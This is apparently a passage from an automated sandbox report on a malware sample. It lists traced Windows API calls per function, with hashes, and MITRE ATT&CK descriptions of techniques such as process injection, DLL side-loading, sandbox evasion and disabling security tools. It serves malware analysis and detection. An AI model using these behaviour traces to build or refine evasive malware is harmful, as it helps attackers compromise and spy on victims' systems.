Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

CloseHandle.KERNEL32(?), ref: 048D8B58

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
Instruction ID: 8465528f184aeae8c15724f5f3e1509c95576b755e22df8027b565c0737c208c
Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
Instruction Fuzzy Hash: 5C3141B1942258ABDB68EF54DC40FEEB778EF44705F104A99A50AE2190EBB06F44CF91

Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
wsprintfA.USER32 ref: 004189E0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

%dx%d, xrefs: 004189D7

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5

Function 0493F25E Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0493F27A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0493F293

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction ID: a3073f86f033dc0762910c96d416c78aba213c6e155ca21a57aa8dc8bf2ee5ef
Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction Fuzzy Hash: 7901FC36B08721DEF7245B74ACC4E5A2A59EB827BAB30433AF625810E4FF5168405584

Function 048D1C57 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00420DA8), ref: 048D1C7C
ExitProcess.KERNEL32 ref: 048D1C88
strtok_s.MSVCRT ref: 048D1C9F

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
Instruction ID: 582df209524071b0a1a216d9e03802c5f022abb4f9cbcc0d2f29f4be46f6f1f0
Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
Instruction Fuzzy Hash: 8C113D74D01109EFDB04DFE4D948AEDBB74BF44309F108569E916A7250EB706B44CB55

Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
wsprintfA.USER32 ref: 00417B83

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5

Function 048D7D77 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 048D7DA7
RtlAllocateHeap.NTDLL(00000000), ref: 048D7DAE
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 048D7DBB
wsprintfA.USER32 ref: 048D7DEA

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: 5bad1d02d22aa6d1aaad1776c8cb42f0c42a8c3affd7fec207b92529f2d6a107
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: A6112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10421AF605A2280E2395940C7B5

Function 048D7E27 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 048D7E5A
RtlAllocateHeap.NTDLL(00000000), ref: 048D7E61
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 048D7E74
wsprintfA.USER32 ref: 048D7EAE

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: 18616a4ca0d8374c3e9ce5bfd8305e6b04bee16cadbc4ba5ded6406fab76f9be
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: 91118EB1E06228EBEB208B54DC45FA9BB78FB05711F1007A6F619E32C0D7746A408B55

Function 048D3AD0 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00420F44), ref: 048D3AD9
StrCmpCA.SHLWAPI(?,00420F48), ref: 048D3AF3
StrCmpCA.SHLWAPI(?,00420F4C), ref: 048D3B0D
strtok_s.MSVCRT ref: 048D3B88

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
Instruction ID: 35825619a44e8d26ad7604844eb2b6b8468c2c23b13a5aaa1c896028a0450eb5
Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
Instruction Fuzzy Hash: AB11FAB0F012099FDB14CFE9D948BEEB7B9EF44305F108529E915BA250E774A500CF56

Function 048D96D7 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(048D3FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,048D3FA5,?), ref: 048D96F3
GetFileSizeEx.KERNEL32(000000FF,048D3FA5), ref: 048D9710
CloseHandle.KERNEL32(000000FF), ref: 048D971E

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: e88cab955f6d8ef20d8a9c2997a3a333ad05a9e37bb4029c94c1af18998e586e
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: 10F03779E15208BBDB14DFB0EC49F9E77BAAB48704F10C695FA25E72C0E630A6018B40

Function 048CA2F7 Relevance: 6.0, APIs: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(004212DC), ref: 048CA2FF
GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 048CA325
GetProcAddress.KERNEL32(006D70A8,00421310), ref: 048CA33C
FreeLibrary.KERNEL32(006D70A8), ref: 048CA360

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID:
API String ID: 2256533930-0
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction ID: 5c903e34a7090892d2ad61207ee75e3c183da2928c3bd6161a3eb0534f093210
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: 4FF0F9B4A0A228EFD7049B69ED58B5537A6F308701F506A2AF505C72E0E3B4A484CB66

Function 048D6FFA Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D6FD1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 048D6FEF
CloseHandle.KERNEL32(00000000), ref: 048D7000
Sleep.KERNEL32(00001770), ref: 048D700B
CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D7021
ExitProcess.KERNEL32 ref: 048D7029

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
Instruction ID: fca186621d3eb18b1bd5f03296a0a45bf738d7bbcc5501135010258363603b68
Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
Instruction Fuzzy Hash: 97F05E30E4A229EAE720BBA4DC04B7DB775AB04709F140F15B912E51D0EBB07900DA63

Function 0493EE4F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0493EE8E
__IsNonwritableInCurrentImage.LIBCMT ref: 0493EF42

Strings

csm, xrefs: 0493EF2C

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction ID: 276f6a6ec2d0b4def521059e0a1fa16a53a83a4cb579a160ead7a987a41dc6d2
Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction Fuzzy Hash: F541C434A00218DFDF20EF68C884A9EBBB6FF86315F148165F919AB391D771B911CB90

Function 0493F93A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 0493FA45

Strings

MOC, xrefs: 0493F971
RCC, xrefs: 0493F979

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction ID: 1b41783f10898cfe42e5cd9ca6a3d73c93bf2af7f8815e8df54fa35e19088435
Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction Fuzzy Hash: 40413871D00109EFDF15CF98CD81AAEBBB9FF49309F148169E909A7224E335A950DB51

Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
lstrcatA.KERNEL32(?,02EB5A38), ref: 004152F8

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Strings

9dA, xrefs: 0041531F, 00415344, 00415322

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: 9dA
API String ID: 2699682494-3568425128
Opcode ID: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
Opcode Fuzzy Hash: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5

Function 048CBCB7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048CA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4

lstrlen.KERNEL32(00000000), ref: 048CBED6

Part of subcall function 048D9227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 048D9249

StrStrA.SHLWAPI(00000000,0042143C), ref: 048CBF04
lstrlen.KERNEL32(00000000), ref: 048CBFDC
lstrlen.KERNEL32(00000000), ref: 048CBFF0

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID:
API String ID: 1440504306-0
Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
Instruction ID: e5af900dbbfcdf285809b223aeb4e56fae8274c38d85131997db7c34486a0dec
Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
Instruction Fuzzy Hash: 88B121719012189BDF1CFBA4DC95EEE7339AF14209F504A6DE507E6090EFB47A48CB62

Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

q?A, xrefs: 00413ED2

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: q?A
API String ID: 3840410801-4084695119
Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55

Function 048D53F7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202

lstrcat.KERNEL32(?,00000000), ref: 048D5431
lstrcat.KERNEL32(?,00421058), ref: 048D544E
lstrcat.KERNEL32(?,006D6FF8), ref: 048D5462
lstrcat.KERNEL32(?,0042105C), ref: 048D5474

Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4DE3
Part of subcall function 048D4DC7: FindFirstFileA.KERNEL32(?,?), ref: 048D4DFA

Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 048D4E28
Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 048D4E3E
Part of subcall function 048D4DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 048D5034
Part of subcall function 048D4DC7: FindClose.KERNEL32(000000FF), ref: 048D5049

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
Instruction ID: c5d79f88e4a653acf268e5c6c6aace9aa802221ad40b290780f3db0018b59b83
Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
Instruction Fuzzy Hash: CB21C876D01218A7DB14FBB4EC85EE9333D9B54700F404B59B696D2190EEB46BC8CB92

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
